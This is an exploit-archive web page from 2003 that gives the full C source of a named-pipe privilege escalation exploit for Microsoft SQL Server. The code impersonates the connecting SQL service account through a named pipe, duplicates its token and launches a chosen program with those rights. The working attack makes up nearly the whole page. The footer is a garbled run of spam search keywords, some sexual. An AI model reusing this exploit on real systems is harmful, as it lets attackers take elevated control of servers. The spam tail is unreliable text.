about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft SQL Server Named Pipe Privilege Escalation Exploit




2003-07-15 Microsoft SQL Server Named Pipe Privilege Escalation Exploit 
/* 
 * Author: Maceo and wirepair
 * Modified to take advantage of CAN-2003-0496 Named Pipe Filename 
 * MSSQL Local Privilege Escalation Found by @stake. Use with their
advisory 
 */


#include 
#include 


int main(int argc, char **argv)
{
 char szPipe[64];
 DWORD dwNumber = 0;
 DWORD dwType = REG_DWORD;
 DWORD dwSize = sizeof(DWORD);
 DWORD dw = GetLastError();
 HANDLE hToken, hToken2;
 PGENERIC_MAPPING pGeneric;
 SECURITY_ATTRIBUTES sa;
 DWORD dwAccessDesired;
 PACL pACL = NULL;
 PSECURITY_DESCRIPTOR pSD = NULL;
 STARTUPINFO si;
 PROCESS_INFORMATION pi;


 if (argc != 2) {
	 fprintf(stderr, "Usage: %s \nNamed Pipe Local 
Priv Escalation found by @stake.\n"
	 "This code is to be used with MS-SQL exactly as 
outlined in their advisory\n"
	 "All credit for this code goes to Maceo, he did a 
fine job.. -wire\n"
	 "Also thanks goes to brett Moore for helping me 
with DuplicateTokenEx, thanks buddy guy!\n",argv[0]);
					 exit(1);
 }
 memset(&si,0,sizeof(si));
 sprintf(szPipe, "\\\\.\\pipe\\poop");

 // create the named pipe
 HANDLE hPipe = 0;
 hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
 if (hPipe == INVALID_HANDLE_VALUE) {
 printf ("Failed to create named pipe:\n %s\n", 
szPipe);
 return 3;
 }
 printf("Created Named Pipe: \\\\.\\pipe\\poop\n");

 // setup security attribs
 pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, 
SECURITY_DESCRIPTOR_MIN_LENGTH); 
 InitializeSecurityDescriptor(pSD, 
SECURITY_DESCRIPTOR_REVISION);
 SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE); 
 sa.nLength = sizeof (SECURITY_ATTRIBUTES);
 sa.lpSecurityDescriptor = pSD;
 sa.bInheritHandle = FALSE;

 printf("Waiting for connection...\n");
 // wait for client to connect 
 ConnectNamedPipe (hPipe, NULL);

 // assume the identity of the client //
 if (!ImpersonateNamedPipeClient (hPipe)) {
 printf ("Failed to impersonate the named pipe.\n");
 CloseHandle(hPipe);
 return 5;
 }

 if (!OpenThreadToken(GetCurrentThread(), 
TOKEN_ALL_ACCESS, TRUE, &hToken )) {
	 if (hToken != INVALID_HANDLE_VALUE) {
			 printf("GetLastError: %u\n", dw);
 CloseHandle(hToken);
			 exit(0);
		 }
 }
 
 printf("Duplicating Token...\n");
 if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,&sa,SecurityImpersonation, 
TokenPrimary,&hToken2) == 0) {
	 printf("error in duplicate token\n");
	 printf("GetLastError: %u\n", dw);
	 exit(0);
 }
 MapGenericMask( &dwAccessDesired, pGeneric );

 // display impersonating users name
 dwSize = 256;
 char szUser[256];
 GetUserName(szUser, &dwSize);
 printf ("Impersonating: %s\n", szUser);

 si.cb = sizeof(si);
 si.lpDesktop = NULL;

 printf("Creating New Process %s\n", argv[1]); 
 if(!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, 
&sa,true, NORMAL_PRIORITY_CLASS | 
CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
 printf("GetLastError: %u\n", dw);
 }
 CloseHandle(hPipe);

 return 0;
}


securitydot.net - 2003-07-15

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:18:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Bluefilm.c Internet e Www fuckin vidios sex www.lalats Www.india. Udayanthi. t984t t984t Bluefilm.c php guestb perl expol Www vedu s t370t sexygirals t821t search; sexygirals 200 /compo exploits f t278t Www inimal Girlcollag ww.pink.co ww.pink.co ashvariya ww.pink.co free teen t309t Www sexyga NetVissa ww.pink.co gujarati s free teen Womansexe linux elev Yahoosex Www flim s CMS is Fre l t t e Www.Indian gei hot hindi syriasex nude katri Www lalat. nude katri +Powered+b php guestb nude katri